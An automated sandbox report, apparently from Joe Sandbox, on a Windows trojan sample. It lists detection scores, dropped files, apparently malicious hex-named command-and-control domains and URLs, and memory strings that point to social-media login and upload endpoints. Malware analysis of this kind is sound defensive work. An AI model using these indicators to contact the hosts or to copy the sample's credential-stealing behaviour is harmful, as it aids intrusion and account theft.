SourceDetectionScannerLabelLink
IpB8f8qwze.exe46%VirustotalBrowse
IpB8f8qwze.exe19%MetadefenderBrowse
IpB8f8qwze.exe38%ReversingLabsWin32.Trojan.Phonzy

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe19%MetadefenderBrowse
C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe38%ReversingLabsWin32.Trojan.Phonzy
C:\Users\user\AppData\Local\Temp\MSI75EE.tmp0%MetadefenderBrowse
C:\Users\user\AppData\Local\Temp\MSI75EE.tmp0%ReversingLabs
C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe8%MetadefenderBrowse
C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe0%ReversingLabs
C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe3%MetadefenderBrowse
C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe2%ReversingLabs
C:\Users\user\AppData\Local\Temp\download\atl71.dll3%MetadefenderBrowse
C:\Users\user\AppData\Local\Temp\download\atl71.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dll3%MetadefenderBrowse
C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\download\download_engine.dll0%MetadefenderBrowse
C:\Users\user\AppData\Local\Temp\download\download_engine.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\download\msvcp71.dll0%MetadefenderBrowse
C:\Users\user\AppData\Local\Temp\download\msvcp71.dll3%ReversingLabs
C:\Users\user\AppData\Local\Temp\download\msvcr71.dll0%MetadefenderBrowse
C:\Users\user\AppData\Local\Temp\download\msvcr71.dll3%ReversingLabs
C:\Users\user\AppData\Local\Temp\download\zlib1.dll0%MetadefenderBrowse
C:\Users\user\AppData\Local\Temp\download\zlib1.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\xldl.dll3%MetadefenderBrowse
C:\Users\user\AppData\Local\Temp\xldl.dll0%ReversingLabs

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
9A3A97F6F45F2C2B.com8%VirustotalBrowse
9a3a97f6f45f2c2b.com8%VirustotalBrowse
a36e971e03d9cbf8.com1%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
http://9A3A97F6F45F2C2B.com/20%Avira URL Cloudsafe
http://A36E971E03D9CBF8.com/info_old/w0%Avira URL Cloudsafe
https://deff.nelreports.net/api/report?cat=msn0%URL Reputationsafe
https://deff.nelreports.net/api/report?cat=msn0%URL Reputationsafe
https://deff.nelreports.net/api/report?cat=msn0%URL Reputationsafe
https://mem.gfx.ms/me/MeControl/10.19168.0/en-US/meCore.min.js0%Avira URL Cloudsafe
https://twitter.comsec-fetch-dest:0%Avira URL Cloudsafe
http://crl.pki.goog/GTS1O1core.crl00%URL Reputationsafe
http://crl.pki.goog/GTS1O1core.crl00%URL Reputationsafe
http://crl.pki.goog/GTS1O1core.crl00%URL Reputationsafe
http://9A3A97F6F45F2C2B.com/info_old/wppyG$0%Avira URL Cloudsafe
http://images.outbrainimg.com/transform/v3/eyJpdSI6IjE4MmE0M2M0MDY3OGU1N2E4MjhkM2NjNDdlNGMzZmNkYjU1N0%Avira URL Cloudsafe
https://7411B26051C176C0.xyz/K0%Avira URL Cloudsafe
http://images.outbrainimg.com/transform/v3/eyJpdSI6ImY3MDA1MDJkMTdmZDY0M2VkZTBjNzg5MTE1OWEyYTYxMWRiN0%Avira URL Cloudsafe
http://9A3A97F6F45F2C2B.com/0%Avira URL Cloudsafe
http://pki.goog/gsr2/GTS1O1.crt00%URL Reputationsafe
http://pki.goog/gsr2/GTS1O1.crt00%URL Reputationsafe
http://pki.goog/gsr2/GTS1O1.crt00%URL Reputationsafe
https://pki.goog/repository/00%URL Reputationsafe
https://pki.goog/repository/00%URL Reputationsafe
https://pki.goog/repository/00%URL Reputationsafe
https://mem.gfx.ms/meversion?partner=RetailStore2&market=en-us&uhf=10%Avira URL Cloudsafe
https://7411B26051C176C0.xyz/0%Avira URL Cloudsafe
https://mem.gfx.ms/me/MeControl/10.19168.0/en-US/meBoot.min.js0%Avira URL Cloudsafe
http://crl.pki.goog/gsr2/gsr2.crl0?0%URL Reputationsafe
http://crl.pki.goog/gsr2/gsr2.crl0?0%URL Reputationsafe
http://crl.pki.goog/gsr2/gsr2.crl0?0%URL Reputationsafe
http://pki.goog/gsr2/GTSGIAG3.crt0)0%Avira URL Cloudsafe
https://www.messenger.comhttps://www.messenger.com/login/nonce/ookie:0%Avira URL Cloudsafe
http://9a3a97f6f45f2c2b.com/info_old/g0%Avira URL Cloudsafe
http://pki.goog/gsr2/GTS1O1.crt0#0%Avira URL Cloudsafe
http://9a3a97f6f45f2c2b.com/info_old/e0%Avira URL Cloudsafe
http://9a3a97f6f45f2c2b.com/info_old/r0%Avira URL Cloudsafe
https://aefd.nelreports.net/api/report?cat=bingth0%Avira URL Cloudsafe
http://A36E971E03D9CBF8.com/I0%Avira URL Cloudsafe
http://9A3A97F6F45F2C2B.com/info_old/ddd0%Avira URL Cloudsafe
http://C41676C07A61A961.com/info_old/wM0%Avira URL Cloudsafe
http://C41676C07A61A961.com/0%Avira URL Cloudsafe
http://9a3a97f6f45f2c2b.com//fine/send0%Avira URL Cloudsafe
http://www.youtube.com&#J$0%Avira URL Cloudsafe
http://A36E971E03D9CBF8.com/d0%Avira URL Cloudsafe
http://images.outbrainimg.com/transform/v3/eyJpdSI6IiIsIml1ZSI6Imh0dHA6Ly9pbWFnZXMyLnplbWFudGEuY29tL0%Avira URL Cloudsafe
https://www.instagram.comsec-fetch-mode:0%Avira URL Cloudsafe
http://9a3a97f6f45f2c2b.com/rl0%Avira URL Cloudsafe
https://twitter.comReferer:0%Avira URL Cloudsafe
http://www.interestvideo.com/video1.php0%Avira URL Cloudsafe
http://a36a97f6f45f2c2b.com/0%Avira URL Cloudsafe
http://9a3a97f6f45f2c2b.com/info_old/w0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
9A3A97F6F45F2C2B.com
104.21.6.78
truetrueunknown
9a3a97f6f45f2c2b.com
104.21.6.78
truetrueunknown
a36e971e03d9cbf8.com
unknown
unknowntrueunknown
c41676c07a61a961.com
unknown
unknowntrue
    		unknown
    C41676C07A61A961.com
    		unknown
    		unknowntrue
      		unknown
      A36E971E03D9CBF8.com
      		unknown
      		unknowntrue
        		unknown

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        http://9a3a97f6f45f2c2b.com/info_old/gfalse
        • Avira URL Cloud: safe
        		unknown
        http://9a3a97f6f45f2c2b.com/info_old/efalse
        • Avira URL Cloud: safe
        		unknown
        http://9a3a97f6f45f2c2b.com/info_old/rfalse
        • Avira URL Cloud: safe
        		unknown
        http://9A3A97F6F45F2C2B.com/info_old/dddtrue
        • Avira URL Cloud: safe
        		unknown
        http://9a3a97f6f45f2c2b.com//fine/sendfalse
        • Avira URL Cloud: safe
        		unknown
        http://9a3a97f6f45f2c2b.com/info_old/wfalse
        • Avira URL Cloud: safe
        		unknown

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/scripttemplateecv953D.tmp.9.drfalse
          		high
          https://duckduckgo.com/chrome_newtab83C12B0D0FA88B10.exe, 00000002.00000003.284835796.00000000006E7000.00000004.00000001.sdmp, Localwebdata1615173777790.2.drfalse
            		high
            https://duckduckgo.com/ac/?q=83C12B0D0FA88B10.exe, 00000002.00000003.284835796.00000000006E7000.00000004.00000001.sdmp, Localwebdata1615173777790.2.drfalse
              		high
              http://9A3A97F6F45F2C2B.com/283C12B0D0FA88B10.exe, 00000004.00000002.273069439.00000000006F5000.00000004.00000020.sdmptrue
              • Avira URL Cloud: safe
              		unknown
              https://www.messenger.com/83C12B0D0FA88B10.exe, 00000002.00000002.311604148.00000000033CC000.00000004.00000001.sdmp, 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmpfalse
                		high
                https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=58648497779ecv953D.tmp.9.drfalse
                  		high
                  https://cvision.media.net/new/286x175/2/75/95/36/612b163a-ff7b-498a-bad2-3c52bbd2c504.jpg?v=9ecv953D.tmp.9.drfalse
                    		high
                    http://A36E971E03D9CBF8.com/info_old/w83C12B0D0FA88B10.exe, 00000004.00000002.273069439.00000000006F5000.00000004.00000020.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://cvision.media.net/new/286x175/2/57/35/144/83ebc513-f6d1-4e0e-a39a-bef975147e85.jpg?v=9ecv953D.tmp.9.drfalse
                      		high
                      http://www.msn.comecv953D.tmp.9.drfalse
                        		high
                        http://www.nirsoft.net1615173766196.exe, 00000009.00000002.277078839.0000000000198000.00000004.00000010.sdmpfalse
                          		high
                          https://deff.nelreports.net/api/report?cat=msnecv953D.tmp.9.drfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          https://contextual.media.net/__media__/js/util/nrrV9140.jsecv953D.tmp.9.drfalse
                            		high
                            https://twitter.com/ookie:83C12B0D0FA88B10.exe, 00000002.00000002.311604148.00000000033CC000.00000004.00000001.sdmp, 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmpfalse
                              		high
                              https://mem.gfx.ms/me/MeControl/10.19168.0/en-US/meCore.min.jsecv953D.tmp.9.drfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://twitter.comsec-fetch-dest:83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCc13122162a9a46c3b4cbf05ffccde0fecv953D.tmp.9.drfalse
                                		high
                                https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=3931852ecv953D.tmp.9.drfalse
                                  		high
                                  http://www.msn.com/?ocid=iehpecv953D.tmp.9.drfalse
                                    		high
                                    https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCee0d4d5fd4424c8390d703b105f82c3ecv953D.tmp.9.drfalse
                                      		high
                                      http://crl.pki.goog/GTS1O1core.crl0ecv953D.tmp.9.drfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://9A3A97F6F45F2C2B.com/info_old/wppyG$83C12B0D0FA88B10.exe, 00000004.00000002.273150697.000000000071C000.00000004.00000020.sdmptrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://images.outbrainimg.com/transform/v3/eyJpdSI6IjE4MmE0M2M0MDY3OGU1N2E4MjhkM2NjNDdlNGMzZmNkYjU1Necv953D.tmp.9.drfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://www.messenger.com83C12B0D0FA88B10.exe, 00000002.00000002.311604148.00000000033CC000.00000004.00000001.sdmp, 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmpfalse
                                        		high
                                        http://www.nirsoft.net/1615173766196.exe, 1615173766196.exe.2.drfalse
                                          		high
                                          https://www.instagram.com/graphql/query/?query_hash=149bef52a3b2af88c0fec37913fe1cbc&variables=%7B%283C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmpfalse
                                            		high
                                            https://upload.twitter.com/i/media/upload.jsoncommand=FINALIZE&media_id=83C12B0D0FA88B10.exe, 00000002.00000002.311604148.00000000033CC000.00000004.00000001.sdmp, 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmpfalse
                                              		high
                                              https://www.instagram.com/83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmpfalse
                                                		high
                                                http://schemas.xmlsoap.org/soap/encoding/download_engine.dll.2.drfalse
                                                  		high
                                                  http://www.xunlei.com/GETdownload_engine.dll.2.drfalse
                                                    		high
                                                    https://7411B26051C176C0.xyz/K83C12B0D0FA88B10.exe, 00000002.00000003.306952619.0000000002F45000.00000004.00000040.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC5bdddb231cf54f958a5b6e76e9d8eeeecv953D.tmp.9.drfalse
                                                      		high
                                                      https://optanon.blob.core.windows.net/skins/4.1.0/default_flat_top_two_button_black/v2/css/optanon.cecv953D.tmp.9.drfalse
                                                        		high
                                                        https://upload.twitter.com/i/media/upload.json%dcommand=INIT&total_bytes=&media_type=image%2Fjpeg&me83C12B0D0FA88B10.exe, 00000002.00000002.311604148.00000000033CC000.00000004.00000001.sdmp, 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmpfalse
                                                          		high
                                                          http://images.outbrainimg.com/transform/v3/eyJpdSI6ImY3MDA1MDJkMTdmZDY0M2VkZTBjNzg5MTE1OWEyYTYxMWRiNecv953D.tmp.9.drfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://9A3A97F6F45F2C2B.com/83C12B0D0FA88B10.exe, 00000004.00000002.273069439.00000000006F5000.00000004.00000020.sdmptrue
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://www.messenger.com/origin:83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmpfalse
                                                            		high
                                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=83C12B0D0FA88B10.exe, 00000002.00000003.284835796.00000000006E7000.00000004.00000001.sdmp, Localwebdata1615173777790.2.drfalse
                                                              		high
                                                              http://pki.goog/gsr2/GTS1O1.crt0ecv953D.tmp.9.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1ecv953D.tmp.9.drfalse
                                                                		high
                                                                https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xmlecv953D.tmp.9.drfalse
                                                                  		high
                                                                  https://contextual.media.net/ecv953D.tmp.9.drfalse
                                                                    		high
                                                                    https://optanon.blob.core.windows.net/skins/4.1.0/default_flat_top_two_button_black/v2/images/cookieecv953D.tmp.9.drfalse
                                                                      		high
                                                                      https://pki.goog/repository/0ecv953D.tmp.9.drfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      https://mem.gfx.ms/meversion?partner=RetailStore2&market=en-us&uhf=1ecv953D.tmp.9.drfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://api.twitter.com/1.1/statuses/update.json83C12B0D0FA88B10.exe, 00000002.00000002.311604148.00000000033CC000.00000004.00000001.sdmp, 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmpfalse
                                                                        		high
                                                                        https://cvision.media.net/new/300x300/3/167/174/27/39ab3103-8560-4a55-bfc4-401f897cf6f2.jpg?v=9ecv953D.tmp.9.drfalse
                                                                          		high
                                                                          http://www.msn.com/ecv953D.tmp.9.drfalse
                                                                            		high
                                                                            https://7411B26051C176C0.xyz/83C12B0D0FA88B10.exe, 00000002.00000003.306952619.0000000002F45000.00000004.00000040.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://upload.twitter.com/i/media/upload.json83C12B0D0FA88B10.exe, 00000002.00000002.311604148.00000000033CC000.00000004.00000001.sdmp, 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmpfalse
                                                                              		high
                                                                              https://www.cloudflare.com/5xx-error-landingIpB8f8qwze.exe, 00000000.00000002.261025930.0000000002C95000.00000004.00000040.sdmp, 83C12B0D0FA88B10.exe, 00000002.00000003.286615363.0000000003F8E000.00000004.00000001.sdmp, 83C12B0D0FA88B10.exe, 00000004.00000003.271498084.0000000003EF0000.00000004.00000001.sdmpfalse
                                                                                		high
                                                                                https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC828bc1cde9f04b788c98b5423157734ecv953D.tmp.9.drfalse
                                                                                  		high
                                                                                  https://twitter.com/compose/tweetsec-fetch-mode:83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmpfalse
                                                                                    		high
                                                                                    https://www.messenger.com/accept:83C12B0D0FA88B10.exe, 00000002.00000002.311604148.00000000033CC000.00000004.00000001.sdmp, 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmpfalse
                                                                                      		high
                                                                                      http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/consent/55a804ecv953D.tmp.9.drfalse
                                                                                        		high
                                                                                        https://contextual.media.net/803288796/fcmain.js?&gdpr=0&cid=8CU157172&cpcd=pC3JHgSCqY8UHihgrvGr0A%3ecv953D.tmp.9.drfalse
                                                                                          		high
                                                                                          https://mem.gfx.ms/me/MeControl/10.19168.0/en-US/meBoot.min.jsecv953D.tmp.9.drfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          https://contextual.media.net/48/nrrV18753.jsecv953D.tmp.9.drfalse
                                                                                            		high
                                                                                            http://crl.pki.goog/gsr2/gsr2.crl0?ecv953D.tmp.9.drfalse
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            		unknown
                                                                                            http://pki.goog/gsr2/GTSGIAG3.crt0)ecv953D.tmp.9.drfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            https://upload.twitter.com/i/media/upload.json?command=APPEND&media_id=%s&segment_index=083C12B0D0FA88B10.exe, 00000002.00000002.311604148.00000000033CC000.00000004.00000001.sdmp, 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmpfalse
                                                                                              		high
                                                                                              https://feedback.googleusercontent.com83C12B0D0FA88B10.exe, 83C12B0D0FA88B10.exe, 00000004.00000003.270705708.0000000003F1A000.00000004.00000001.sdmp, 83C12B0D0FA88B10.exe, 00000004.00000003.266586858.0000000003F38000.00000004.00000001.sdmpfalse
                                                                                                		high
                                                                                                https://www.messenger.comhttps://www.messenger.com/login/nonce/ookie:83C12B0D0FA88B10.exe, 00000002.00000002.311604148.00000000033CC000.00000004.00000001.sdmp, 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                		unknown
                                                                                                http://www.xunlei.com/download_engine.dll.2.drfalse
                                                                                                  		high
                                                                                                  http://pki.goog/gsr2/GTS1O1.crt0#ecv953D.tmp.9.drfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  		unknown
                                                                                                  http://9A3A97F6F45F2C2B.com/info_old/g83C12B0D0FA88B10.exe, 00000002.00000003.286615363.0000000003F8E000.00000004.00000001.sdmptrue
                                                                                                    		unknown
                                                                                                    https://aefd.nelreports.net/api/report?cat=bingthecv953D.tmp.9.drfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    		unknown
                                                                                                    http://A36E971E03D9CBF8.com/I83C12B0D0FA88B10.exe, 00000004.00000002.273069439.00000000006F5000.00000004.00000020.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    		unknown
                                                                                                    https://upload.twitter.com/i/media/upload.json?command=APPEND&media_id=%s&segment_index=0accept:83C12B0D0FA88B10.exe, 00000002.00000002.311604148.00000000033CC000.00000004.00000001.sdmp, 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmpfalse
                                                                                                      		high
                                                                                                      http://schemas.xmlsoap.org/soap/envelope/download_engine.dll.2.drfalse
                                                                                                        		high
                                                                                                        http://C41676C07A61A961.com/info_old/wM83C12B0D0FA88B10.exe, 00000004.00000002.273069439.00000000006F5000.00000004.00000020.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        https://geolocation.onetrust.com/cookieconsentpub/v1/geo/locationecv953D.tmp.9.drfalse
                                                                                                          		high
                                                                                                          https://assets.adobedtm.com/launch-EN7b3d710ac67a4a1195648458258f97dd.min.jsecv953D.tmp.9.drfalse
                                                                                                            		high
                                                                                                            http://C41676C07A61A961.com/83C12B0D0FA88B10.exe, 00000004.00000002.273069439.00000000006F5000.00000004.00000020.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		unknown
                                                                                                            https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCfd484f9188564713bbc5d13d862ebbfecv953D.tmp.9.drfalse
                                                                                                              		high
                                                                                                              https://curl.haxx.se/docs/http-cookies.html83C12B0D0FA88B10.exe, 00000002.00000002.311356783.0000000003200000.00000004.00000001.sdmp, 83C12B0D0FA88B10.exe, 00000004.00000002.276824908.0000000003300000.00000004.00000001.sdmpfalse
                                                                                                                		high
                                                                                                                http://www.youtube.com&#J$83C12B0D0FA88B10.exe, 00000004.00000003.263407616.0000000003EF2000.00000004.00000001.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		low
                                                                                                                http://www.openssl.org/support/faq.htmldownload_engine.dll.2.drfalse
                                                                                                                  		high
                                                                                                                  https://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_333%2Cw_311%2Cc_fill%2Cg_faces:autecv953D.tmp.9.drfalse
                                                                                                                    		high
                                                                                                                    http://A36E971E03D9CBF8.com/d83C12B0D0FA88B10.exe, 00000004.00000002.273069439.00000000006F5000.00000004.00000020.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    		unknown
                                                                                                                    http://images.outbrainimg.com/transform/v3/eyJpdSI6IiIsIml1ZSI6Imh0dHA6Ly9pbWFnZXMyLnplbWFudGEuY29tLecv953D.tmp.9.drfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    		unknown
                                                                                                                    https://www.instagram.comsec-fetch-mode:83C12B0D0FA88B10.exe, 00000002.00000002.311604148.00000000033CC000.00000004.00000001.sdmp, 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    		unknown
                                                                                                                    https://www.instagram.com/accounts/login/ajax/facebook/83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96eecv953D.tmp.9.drfalse
                                                                                                                        		high
                                                                                                                        http://crl.thawte.com/ThawteTimestampingCA.crl0download_engine.dll.2.drfalse
                                                                                                                          		high
                                                                                                                          http://9a3a97f6f45f2c2b.com/rl83C12B0D0FA88B10.exe, 00000004.00000002.273069439.00000000006F5000.00000004.00000020.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          		unknown
                                                                                                                          https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2ecv953D.tmp.9.drfalse
                                                                                                                            		high
                                                                                                                            https://www.instagram.com/sec-fetch-site:83C12B0D0FA88B10.exe, 00000002.00000002.311604148.00000000033CC000.00000004.00000001.sdmp, 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://twitter.comReferer:83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmpfalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              		unknown
                                                                                                                              http://www.interestvideo.com/video1.php83C12B0D0FA88B10.exe, 00000004.00000002.276824908.0000000003300000.00000004.00000001.sdmpfalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              		unknown
                                                                                                                              http://a36a97f6f45f2c2b.com/83C12B0D0FA88B10.exe, 00000004.00000002.273118658.000000000070F000.00000004.00000020.sdmpfalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              		unknown
                                                                                                                              https://www.instagram.com/accept:83C12B0D0FA88B10.exe, 00000002.00000002.311604148.00000000033CC000.00000004.00000001.sdmp, 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://www.messenger.com/login/nonce/83C12B0D0FA88B10.exe, 00000002.00000002.311604148.00000000033CC000.00000004.00000001.sdmp, 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://cvision.media.net/new/300x194/2/138/47/25/3b2da2d4-7a38-47c3-b162-f33e769f51f5.jpg?v=9ecv953D.tmp.9.drfalse
                                                                                                                                    		high

                                                                                                                                    Contacted IPs

                                                                                                                                    • No. of IPs < 25%
                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                    • 75% < No. of IPs

                                                                                                                                    Public

                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                    104.21.6.78
                                                                                                                                    		9A3A97F6F45F2C2B.comUnited States
                                                                                                                                    		13335CLOUDFLARENETUStrue
                                                                                                                                    172.67.134.157
                                                                                                                                    		unknownUnited States
                                                                                                                                    		13335CLOUDFLARENETUSfalse

                                                                                                                                    Private

                                                                                                                                    IP
                                                                                                                                    192.168.2.1
                                                                                                                                    127.0.0.1

                                                                                                                                    General Information

                                                                                                                                    Joe Sandbox Version:31.0.0 Emerald
                                                                                                                                    Analysis ID:364295
                                                                                                                                    Start date:07.03.2021
                                                                                                                                    Start time:19:20:10
                                                                                                                                    Joe Sandbox Product:CloudBasic
                                                                                                                                    Overall analysis duration:0h 11m 43s
                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                    Report type:full
                                                                                                                                    Sample file name:IpB8f8qwze.exe
                                                                                                                                    Cookbook file name:default.jbs
                                                                                                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                    Number of analysed new started processes analysed:37
                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                    Technologies:
                                                                                                                                    • HCA enabled
                                                                                                                                    • EGA enabled
                                                                                                                                    • HDC enabled
                                                                                                                                    • AMSI enabled
                                                                                                                                    Analysis Mode:default
                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                    Detection:MAL
                                                                                                                                    Classification:mal90.bank.troj.spyw.evad.winEXE@32/37@33/4
                                                                                                                                    EGA Information:Failed
                                                                                                                                    HDC Information:
                                                                                                                                    • Successful, ratio: 38.1% (good quality ratio 36.3%)
                                                                                                                                    • Quality average: 79.9%
                                                                                                                                    • Quality standard deviation: 26.7%
                                                                                                                                    HCA Information:
                                                                                                                                    • Successful, ratio: 67%
                                                                                                                                    • Number of executed functions: 68
                                                                                                                                    • Number of non-executed functions: 345
                                                                                                                                    Cookbook Comments:
                                                                                                                                    • Adjust boot time
                                                                                                                                    • Enable AMSI
                                                                                                                                    • Found application associated with file extension: .exe
                                                                                                                                    Warnings:
                                                                                                                                    Show All
                                                                                                                                    • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                                                                    • Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200, 13.64.90.137, 52.255.188.83, 23.211.6.115, 13.88.21.125, 104.42.151.234, 184.30.24.56, 51.104.139.180, 2.20.142.209, 2.20.142.210, 51.103.5.159, 92.122.213.247, 92.122.213.194, 51.104.144.132, 20.54.26.129
                                                                                                                                    • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, skypedataprdcolwus17.cloudapp.net, client.wns.windows.com, fs.microsoft.com, dual-a-0001.a-msedge.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, skypedataprdcolwus16.cloudapp.net
                                                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                    • Report size getting too big, too many NtDeviceIoControlFile calls found.
